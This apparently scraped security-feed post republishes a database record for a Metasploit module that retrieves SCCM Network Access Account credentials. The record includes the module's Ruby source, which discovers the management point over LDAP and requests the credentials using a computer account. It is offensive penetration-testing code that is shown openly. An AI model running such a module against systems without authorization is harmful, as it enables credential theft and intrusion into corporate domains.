{“lastseen”:”2025-08-29T19:24:32″,”description”:”This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server. …”,”published”:”2025-08-29T18:53:23″,”modified”:”2025-03-04T18:55:46″,”type”:”metasploit”,”title”:”Get NAA Credentials”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include ::Msf::Exploit::Remote::HTTP::SCCM\\n include Msf::Exploit::Remote::LDAP\\n include Msf::OptionalSession::LDAP\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Get NAA Credentials’,\\n ‘Description’ =\\u003e %q{\\n This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\\n This requires a computer account, which can be added using the samr_account module.\\n },\\n ‘Author’ =\\u003e [\\n ‘xpn’, # Initial research\\n ‘skelsec’, # Initial obfuscation port\\n ‘smashery’ # module author\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/blog.xpnsec.com\/unobfuscating-network-access-accounts\/’],\\n [‘URL’, ‘https:\/\/github.com\/subat0mik\/Misconfiguration-Manager\/blob\/main\/attack-techniques\/CRED\/CRED-2\/cred-2_description.md’],\\n [‘URL’, ‘https:\/\/github.com\/Mayyhem\/SharpSCCM’],\\n [‘URL’, ‘https:\/\/github.com\/garrettfoster13\/sccmhunter’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [CONFIG_CHANGES],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options([\\n OptAddressRange.new(‘RHOSTS’, [ false, ‘The domain controller (for autodiscovery). Not required if providing a management point and site code’ ]),\\n OptPort.new(‘RPORT’, [ false, ‘The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code’, 389 ]),\\n OptString.new(‘COMPUTER_USER’, [ true, ‘The username of a computer account’ ]),\\n OptString.new(‘COMPUTER_PASS’, [ true, ‘The password of the provided computer account’ ]),\\n OptString.new(‘MANAGEMENT_POINT’, [ false, ‘The management point (SCCM server) to use’ ]),\\n OptString.new(‘SITE_CODE’, [ false, ‘The site code to use on the management point’ ]),\\n OptString.new(‘DOMAIN’, [ true, ‘The domain to authenticate to’, ” ])\\n ])\\n\\n deregister_options(‘LDAPDomain’) # deregister LDAPDomain because DOMAIN is registered and used for both LDAP and HTTP\\n\\n @session_or_rhost_required = false\\n end\\n\\n def find_management_point\\n ldap_connect do |ldap|\\n validate_bind_success!(ldap)\\n\\n if (@base_dn = datastore[‘BASE_DN’])\\n print_status(\\”User-specified base DN: #{@base_dn}\\”)\\n else\\n print_status(‘Discovering base DN automatically’)\\n\\n if (@base_dn = ldap.base_dn)\\n print_status(\\”#{ldap.peerinfo} Discovered base DN: #{@base_dn}\\”)\\n else\\n fail_with(Msf::Module::Failure::UnexpectedReply, \\”Couldn’t discover base DN!\\”)\\n end\\n end\\n raw_objects = ldap.search(base: @base_dn, filter: ‘(objectclass=mssmsmanagementpoint)’, attributes: [‘*’])\\n return nil unless raw_objects.any?\\n\\n raw_obj = raw_objects.first\\n\\n raw_objects.each do |ro|\\n print_good(\\”Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})\\”)\\n end\\n\\n if raw_objects.length \\u003e 1\\n print_warning(\\”Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})\\”)\\n end\\n\\n obj = {}\\n obj[:rhost] = raw_obj[:dnshostname].first\\n obj[:sitecode] = raw_obj[:mssmssitecode].first\\n\\n obj\\n rescue Errno::ECONNRESET\\n fail_with(Msf::Module::Failure::Disconnected, ‘The connection was reset.’)\\n rescue Rex::ConnectionError =\\u003e e\\n fail_with(Msf::Module::Failure::Unreachable, e.message)\\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError =\\u003e e\\n fail_with(Msf::Module::Failure::NoAccess, e.message)\\n rescue Net::LDAP::Error =\\u003e e\\n fail_with(Msf::Module::Failure::Unknown, \\”#{e.class}: #{e.message}\\”)\\n end\\n end\\n\\n def run\\n management_point = datastore[‘MANAGEMENT_POINT’]\\n site_code = datastore[‘SITE_CODE’]\\n if management_point.blank? != site_code.blank?\\n fail_with(Failure::BadConfig, ‘Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)’)\\n end\\n\\n if management_point.blank?\\n begin\\n result = find_management_point\\n fail_with(Failure::NotFound, ‘Failed to find management point’) unless result\\n management_point = result[:rhost]\\n site_code = result[:site_code]\\n rescue ::IOError =\\u003e e\\n fail_with(Failure::UnexpectedReply, e.message)\\n end\\n end\\n\\n opts = {\\n ‘username’ =\\u003e datastore[‘COMPUTER_USER’],\\n ‘password’ =\\u003e datastore[‘COMPUTER_PASS’]\\n }\\n computer_user = datastore[‘COMPUTER_USER’].delete_suffix(‘$’)\\n get_naa_credentials(opts, management_point, site_code, computer_user)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/sccm\/get_naa_credentials.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/sccm\/get_naa_credentials\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:24:32″,”description”:”This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server. …”,”published”:”2025-08-29T18:53:23″,”modified”:”2025-03-04T18:55:46″,”type”:”metasploit”,”title”:”Get NAA Credentials”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-15157","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n